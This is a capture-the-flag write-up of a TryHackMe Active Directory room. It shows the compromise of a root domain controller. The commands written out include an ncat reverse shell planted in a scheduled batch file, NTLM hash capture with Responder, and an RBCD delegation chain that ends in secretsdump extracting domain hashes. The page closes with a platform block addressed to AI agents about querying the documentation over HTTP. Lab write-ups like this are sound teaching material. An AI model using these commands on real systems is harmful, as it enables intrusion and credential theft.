# The Summit {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon We stop the second machine and start the third. Our enumeration process starts all over again. We run another Nmap scan. And find several related ports to windows. We don't have a website this time either. This seems to be a pure AD machine again.

The ports include SMB, RDP, LDAP and Kerberos. After a default service and script scan, we can determine the name of the machine `K2ROOTDC`. Ok, we have now to compromise the root DC. We add `K2ROOTDC.K2.THM` to our `/etc/host` file.

## Foothold We use kerbrute again to enumerate possible users. And are able to spot `administrator` and `j.smith`. ``` kerbrute -users users.txt -password 'REDACTED' -domain k2.thm ```

We try to reuse the hash for the local administrator without success, but are able to log in with it for the user `j.smith`.

## Lateral Movement {% embed url="" %} The first attempt to enumerate the root dc using bloodhound used SharpHound. However, I must have used it incorrectly here, at least it could not be found.

Something seems to be wrong, so let's skip it for now and see what we can discover with `j.smith`.

In the root directory we find the scripts' folder with a `bat` file that copies a file `notes.txt` to `o.armstrong`'s Documents directory. A service or scheduled task could run this as `o.armstrong`.

Unfortunately, we cannot view the scheduled tasks ``` schtasks /query /fo LIST /v ```

If we look at the permissions we see that we have full access to script but cannot write to the file.

But we can delete and replace it.

We first try to write the notes in the scripts folder. To do this, we replace the bat and add full access permissions for `o.armstrong`. {% code overflow="wrap" %} ``` Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\notes.txt C:\Scripts\notes.txt' ``` {% endcode %} ``` icacls "C:\Scripts\backup.bat" /grant o.armstrong:F ```

After a short time, we have the notes, but they don't get us anywhere.

We repeat the step to get the user flag and are successful. {% code overflow="wrap" %} ``` Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\user.txt C:\Scripts\user.txt' ``` {% endcode %}

Now we replace it with a reverse shell using a netcat exe to not trigger the AV. {% hint style="info" %} I had ncat.exe lying arround, not sure if it was from the following source. It is not necessary to get a reverse shell to retrieve`o.armstrong`'s hash for further escalation steps.\ Alternatively, the bat file can be modified directly to retrieve the hash from `o.armstrong`. To do this, set up a responder using sudo `responder -I tun0` and write `net use\10.8.211.1\share` in the bat file. After a short time you will get the hash, so you can save some steps. {% endhint %} {% embed url="" %} We upload the ncat.exe to Scripts using evil-winrm

Start a listener.

And replace the .bat. {% code overflow="wrap" %} ``` Set-Content -Path "C:\Scripts\backup.bat" -Value 'C:\Scripts\.\ncat.exe 10.8.211.1 4444 -e powershell' ``` {% endcode %} Afer a short duration we receive a connection back as `o.armstrong`.

Now we can inspect the scheduled task. ``` schtasks /query /fo LIST /v ```

## Privilege Esclatation Next we want to use bloodhound-python to retrieve valueable information about the AD to find some exploitation path. As already mentioned we weren't successful using SharpHound.exe. We setup DNSChef first. Since we could get problems with the name server using the tool that it does not work properly, we use dnschef. DNSChef is a DNS proxy tool used for DNS spoofing, allowing users to intercept and modify DNS requests. It can be used in penetration testing to redirect traffic or simulate malicious DNS responses for specific domains.

Next we run bloodhound-python with the user j.smith passing his hash. {% code overflow="wrap" %} ``` bloodhound-python -d k2.thm -c All -u 'j.smith' --hashes 'REDACTED:REDACTED' -dc k2.thm -ns 127.0.0.1 ``` {% endcode %}

We see that our compromised target `o.armstrong` is in the group IT DIRECTOR.

By queriying for the shortest path to high value targets, we see that this group has generic write permissions on the machine.

By right clicking on the edge we see an exploitation path. For this we need the credentials of `o.armstrong`.

We can acutally try to get them by stealing his ntlm hash using responder. We set up resonder. The command `sudo responder -I tun0` starts the Responder tool, which is used to capture and respond to network authentication requests, such as SMB and NetBIOS. By specifying the `-I tun0` option, it listens for traffic on the `tun0` network interface, typically used in VPN connections or tunneling, to potentially capture credentials or perform other attacks on that network segment. ``` sudo responder -I tun0 ```

From this blog we get the info how to trigger a request to our responder to leak a hash. {% embed url="" %} We request the following address: ``` curl file://10.8.211.1/leak.leak.html ```

{% hint style="info" %} It is not necessary to get a reverse shell to retrieve`o.armstrong`'s hash for further escalation steps.\ Alternatively, the bat file can be modified directly to retrieve the hash from `o.armstrong`. To do this, set up a responder using sudo `responder -I tun0` and write `net use\10.8.211.1\share` in the bat file. After a short time you will get the hash, so you can save some steps. {% endhint %} Capture the hash...

... and crack it. We got the password for `o.armstrong`.

Again, shoutout to Jaxafed on discussing the following exploit chain, since the initial approach did not work properly. The following request query is provided by Jaxafed. In the end the method **SAMR (Security Account Manager Remote)** seems to be the problem solver. In this exploit chain a computer account named "ATTACKERSYSTEM$" is being added to the K2.THM domain using the SAMR method with the provided credentials. The attacker then delegates permissions from "ATTACKERSYSTEM$" to "K2ROOTDC$" using the RBCD (Resource-Based Constrained Delegation) technique. Next, the attacker impersonates the "Administrator" to request a Kerberos service ticket for the "cifs" service on the domain controller. Finally, the secretsdump tool is used to extract password hashes from the domain controller using the Kerberos ticket (ccache) without needing credentials.\ \ A deep dive to RBCD exploitation can be found here: {% embed url="" %} {% code overflow="wrap" %} ``` addcomputer.py -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host K2ROOTDC.K2.THM -domain-netbios K2.THM 'K2.THM/o.armstrong:REDACTED' ``` {% endcode %} {% code overflow="wrap" %} ``` rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'K2ROOTDC$' -action 'write' 'K2.THM/o.armstrong:REDACTED' ``` {% endcode %} {% code overflow="wrap" %} ``` getST.py -spn 'cifs/K2ROOTDC.k2.thm' -impersonate 'Administrator' 'K2.THM/attackersystem$:Summer2018!' ``` {% endcode %} ``` export KRB5CCNAME=Administrator.ccache ``` {% code overflow="wrap" %} ``` secretsdump.py -k -no-pass 'K2.THM/Administrator@k2rootdc.k2.thm' ``` {% endcode %}

With the extracted hash of `administrator` we are able to log in and retrieve the final flag.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/tryhackme/2024/k2/the-summit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.